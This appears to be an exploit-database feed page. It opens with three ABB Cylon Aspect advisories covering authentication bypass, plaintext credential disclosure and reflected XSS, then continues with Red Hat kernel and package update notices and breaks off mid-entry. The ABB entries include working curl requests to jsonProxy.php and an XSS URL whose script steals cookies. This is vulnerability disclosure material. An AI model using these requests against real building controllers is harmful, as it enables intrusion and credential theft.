ABB Cylon Aspect version 3.08.01 is vulnerable to remote, arbitrary servlet inclusion. The jsonProxy.php endpoint allows unauthenticated remote attackers to access internal services by proxying requests to localhost. This results in an authentication bypass, enabling attackers to interact with multiple java servlets without authorization, potentially exposing sensitive system functions and information.

    ABB Cylon Aspect 3.08.01 (jsonProxy.php) Servlet Inclusion Authentication BypassVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller is vulnerable to remote, arbitrary servletinclusion. The jsonProxy.php endpoint allows unauthenticated remote attackersto access internal services by proxying requests to localhost. This resultsin an authentication bypass, enabling attackers to interact with multiple javaservlets without authorization, potentially exposing sensitive system functionsand information.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5854Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5854.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ curl "http://192.168.73.31/jsonProxy.php?port=7226&application=WatchDogServlet<html><head><title>Servlet Information for [com.aamatrix.servlets.WatchDogServlet]</title></head><body>Servlet Information [com.aamatrix.servlets.WatchDogServlet] <br><br>Version: HTTP/1.0<br>Requested File: /servlets/WatchDogServlet<br></body><BR>Response:<BR>[MESSAGE-BEGIN][HEADER-BEGIN]?[000:02]magicTag=[0xB7][0xAF]&[002:02]size=16&[004:01]version=[0x03]&[005:01]command=[0x81][GENERAL_ACK_RESPONSE]&[006:02]NetworkId=99&[008:02]unitId=1&[010:02]quality=0&[012:04]transactionId=77331[HEADER-END][MESSAGE-BODY-BEGIN][READ-ATTRIBUTE-REQUEST][PUP-ACK-RESPONSE][MESSAGE-BODY-END][MESSAGE-END]<BR>

ABB Cylon Aspect 3.08.01 jsonProxy.php Servlet Inclusion Authentication Bypass

ABB Cylon Aspect version 3.08.01 allows an unauthenticated attacker to disclose credentials in plain-text.

  
ABB Cylon Aspect 3.08.01 (jsonProxy.php) Unauthenticated Credentials Disclosure

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller allows an unauthenticated attacker to disclose  
credentials in plain-text.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5853  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5853.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl "http://192.168.73.31/jsonProxy.php?port=7226&application=ProjectInfo"  
<html>  
<head>  
<link rel='stylesheet' type='text/css' href='../../matrixstyle.css'>  
</head>  
<body class="workscroll" topmargin="0" leftmargin="0" scroll="No">  
<h1>Project Info</h1>  
<br>  
aamuserdefault  
</body>  
</html>

ABB Cylon Aspect 3.08.01 jsonProxy.php Unauthenticated Credential Disclosure

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated reflected cross-site scripting vulnerability. Input passed to the GET parameters query and application is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

  
ABB Cylon Aspect 3.08.01 (jsonProxy.php) Unauthenticated Reflected XSS

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated reflected  
cross-site scripting vulnerability. Input passed to the GET parameters 'query'  
and 'application' is not properly sanitised before being returned to the user.  
This can be exploited to execute arbitrary HTML/JS code in a user's browser  
session in context of an affected site.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5852  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5852.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               http://192.168.73.31/jsonProxy.php?application=%3Cmarquee%3EZSL%3C/marquee%3E?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E

ABB Cylon Aspect 3.08.01 jsonProxy.php Cross Site Scripting

Red Hat Security Advisory 2024-8617-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8617.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:8617-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8617  
Issue date:         2024-10-30  
Revision:           03  
CVE Names:          CVE-2021-47383  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* hw: cpu: intel: Native Branch History Injection (BHI) (CVE-2024-2201)

* kernel: tcp: add sanity checks to rx zerocopy (CVE-2024-26640)

* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)

* kernel: af_unix: Fix garbage collector racing against connect() (CVE-2024-26923)

* kernel: mac802154: fix llsec key resources release in mac802154_llsec_key_del (CVE-2024-26961)

* kernel: scsi: core: Fix unremoved procfs host directory regression (CVE-2024-26935)

* kernel: tty: Fix out-of-bound vmalloc access in imageblit (CVE-2021-47383)

* kernel: net/sched: taprio: extend minimum interval restriction to entire cycle too (CVE-2024-36244)

* kernel: xfs: fix log recovery buffer allocation for the legacy h_size fixup (CVE-2024-39472)

* kernel: netfilter: nft_inner: validate mandatory meta and payload (CVE-2024-39504)

* kernel: USB: class: cdc-wdm: Fix CPU lockup caused by excessive log messages (CVE-2024-40904)

* kernel: mptcp: ensure snd_una is properly initialized on connect (CVE-2024-40931)

* kernel: ipv6: prevent possible NULL dereference in rt6_probe() (CVE-2024-40960)

* kernel: ext4: do not create EA inode under buffer lock (CVE-2024-40972)

* kernel: wifi: mt76: mt7921s: fix potential hung tasks during chip recovery (CVE-2024-40977)

* kernel: net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc() (CVE-2024-40995)

* kernel: ext4: fix uninitialized ratelimit_state->lock access in __ext4_fill_super() (CVE-2024-40998)

* kernel: netpoll: Fix race condition in netpoll_owner_active (CVE-2024-41005)

* kernel: xfs: don't walk off the end of a directory data block (CVE-2024-41013)

* kernel: xfs: add bounds checking to xlog_recover_process_data (CVE-2024-41014)

* kernel: block: initialize integrity buffer to zero before writing it to media (CVE-2024-43854)

* kernel: netfilter: flowtable: initialise extack before use (CVE-2024-45018)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47383

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268118  
https://bugzilla.redhat.com/show_bug.cgi?id=2270100  
https://bugzilla.redhat.com/show_bug.cgi?id=2275604  
https://bugzilla.redhat.com/show_bug.cgi?id=2277171  
https://bugzilla.redhat.com/show_bug.cgi?id=2278176  
https://bugzilla.redhat.com/show_bug.cgi?id=2278235  
https://bugzilla.redhat.com/show_bug.cgi?id=2282357  
https://bugzilla.redhat.com/show_bug.cgi?id=2293654  
https://bugzilla.redhat.com/show_bug.cgi?id=2296067  
https://bugzilla.redhat.com/show_bug.cgi?id=2297476  
https://bugzilla.redhat.com/show_bug.cgi?id=2297488  
https://bugzilla.redhat.com/show_bug.cgi?id=2297515  
https://bugzilla.redhat.com/show_bug.cgi?id=2297544  
https://bugzilla.redhat.com/show_bug.cgi?id=2297556  
https://bugzilla.redhat.com/show_bug.cgi?id=2297561  
https://bugzilla.redhat.com/show_bug.cgi?id=2297579  
https://bugzilla.redhat.com/show_bug.cgi?id=2297582  
https://bugzilla.redhat.com/show_bug.cgi?id=2297589  
https://bugzilla.redhat.com/show_bug.cgi?id=2300296  
https://bugzilla.redhat.com/show_bug.cgi?id=2300297  
https://bugzilla.redhat.com/show_bug.cgi?id=2311715

Red Hat Security Advisory 2024-8617-03

Red Hat Security Advisory 2024-8616-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8616.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: kernel security updateAdvisory ID:        RHSA-2024:8616-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8616Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2022-48773====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: ext4: fix uninitialized ratelimit_state->lock access in __ext4_fill_super() (CVE-2024-40998)* kernel: xprtrdma: fix pointer derefs in error cases of rpcrdma_ep_create (CVE-2022-48773)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-48773References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2297582https://bugzilla.redhat.com/show_bug.cgi?id=2298109

Red Hat Security Advisory 2024-8616-03

Red Hat Security Advisory 2024-8614-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include null pointer and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8614.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security update  
Advisory ID:        RHSA-2024:8614-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8614  
Issue date:         2024-10-30  
Revision:           03  
CVE Names:          CVE-2021-47384  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: ovl: fix use after free in struct ovl_aio_req (CVE-2023-1252)

* hw: cpu: intel: Native Branch History Injection (BHI) (CVE-2024-2201)

* kernel: mm/sparsemem: fix race in accessing memory_section->usage (CVE-2023-52489)

* kernel: blk-mq: fix IO hang from sbitmap wakeup race (CVE-2024-26671)

* kernel: fs/proc: do_task_stat: use sig->stats_lock to gather the threads/children stats (CVE-2024-26686)

* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)

* kernel: mac802154: fix llsec key resources release in mac802154_llsec_key_del (CVE-2024-26961)

* kernel: hwmon: (w83793) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47384)

* kernel: mptcp: ensure snd_nxt is properly initialized on connect (CVE-2024-36889)

* kernel: ipv6: prevent possible NULL dereference in rt6_probe() (CVE-2024-40960)

* kernel: ext4: fix uninitialized ratelimit_state->lock access in __ext4_fill_super() (CVE-2024-40998)

* kernel: filelock: fix potential use-after-free in posix_lock_inode (CVE-2024-41049)

* kernel: mm: prevent derefencing NULL ptr in pfn_section_valid() (CVE-2024-41055)

* kernel: nvmet: fix a possible leak when destroy a ctrl during qp establishment (CVE-2024-42152)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47384

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2176140  
https://bugzilla.redhat.com/show_bug.cgi?id=2268118  
https://bugzilla.redhat.com/show_bug.cgi?id=2269189  
https://bugzilla.redhat.com/show_bug.cgi?id=2272811  
https://bugzilla.redhat.com/show_bug.cgi?id=2273109  
https://bugzilla.redhat.com/show_bug.cgi?id=2275604  
https://bugzilla.redhat.com/show_bug.cgi?id=2278176  
https://bugzilla.redhat.com/show_bug.cgi?id=2282356  
https://bugzilla.redhat.com/show_bug.cgi?id=2284571  
https://bugzilla.redhat.com/show_bug.cgi?id=2297544  
https://bugzilla.redhat.com/show_bug.cgi?id=2297582  
https://bugzilla.redhat.com/show_bug.cgi?id=2300422  
https://bugzilla.redhat.com/show_bug.cgi?id=2300429  
https://bugzilla.redhat.com/show_bug.cgi?id=2301519

Red Hat Security Advisory 2024-8614-03

Red Hat Security Advisory 2024-8613-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include null pointer and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8613.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:8613-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8613  
Issue date:         2024-10-30  
Revision:           03  
CVE Names:          CVE-2021-47384  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: ovl: fix use after free in struct ovl_aio_req (CVE-2023-1252)

* hw: cpu: intel: Native Branch History Injection (BHI) (CVE-2024-2201)

* kernel: mm/sparsemem: fix race in accessing memory_section->usage (CVE-2023-52489)

* kernel: blk-mq: fix IO hang from sbitmap wakeup race (CVE-2024-26671)

* kernel: fs/proc: do_task_stat: use sig->stats_lock to gather the threads/children stats (CVE-2024-26686)

* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)

* kernel: mac802154: fix llsec key resources release in mac802154_llsec_key_del (CVE-2024-26961)

* kernel: hwmon: (w83793) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47384)

* kernel: mptcp: ensure snd_nxt is properly initialized on connect (CVE-2024-36889)

* kernel: ipv6: prevent possible NULL dereference in rt6_probe() (CVE-2024-40960)

* kernel: ext4: fix uninitialized ratelimit_state->lock access in __ext4_fill_super() (CVE-2024-40998)

* kernel: filelock: fix potential use-after-free in posix_lock_inode (CVE-2024-41049)

* kernel: mm: prevent derefencing NULL ptr in pfn_section_valid() (CVE-2024-41055)

* kernel: powerpc/eeh: avoid possible crash when edev->pdev changes (CVE-2024-41064)

* kernel: nvmet: fix a possible leak when destroy a ctrl during qp establishment (CVE-2024-42152)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47384

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2176140  
https://bugzilla.redhat.com/show_bug.cgi?id=2268118  
https://bugzilla.redhat.com/show_bug.cgi?id=2269189  
https://bugzilla.redhat.com/show_bug.cgi?id=2272811  
https://bugzilla.redhat.com/show_bug.cgi?id=2273109  
https://bugzilla.redhat.com/show_bug.cgi?id=2275604  
https://bugzilla.redhat.com/show_bug.cgi?id=2278176  
https://bugzilla.redhat.com/show_bug.cgi?id=2282356  
https://bugzilla.redhat.com/show_bug.cgi?id=2284571  
https://bugzilla.redhat.com/show_bug.cgi?id=2297544  
https://bugzilla.redhat.com/show_bug.cgi?id=2297582  
https://bugzilla.redhat.com/show_bug.cgi?id=2300422  
https://bugzilla.redhat.com/show_bug.cgi?id=2300429  
https://bugzilla.redhat.com/show_bug.cgi?id=2300439  
https://bugzilla.redhat.com/show_bug.cgi?id=2301519

Red Hat Security Advisory 2024-8613-03

Red Hat Security Advisory 2024-8577-03 - An update for krb5 is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8577.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: krb5 security updateAdvisory ID:        RHSA-2024:8577-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8577Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-3596====================================================================Summary: An update for krb5 is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center (KDC).Security Fix(es):* freeradius: forgery attack (CVE-2024-3596)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3596References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263240

Red Hat Security Advisory 2024-8577-03

Red Hat Security Advisory 2024-8572-03 - An update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8572.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pki-deps:10.6 security updateAdvisory ID:        RHSA-2024:8572-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8572Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-38286====================================================================Summary: An update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity 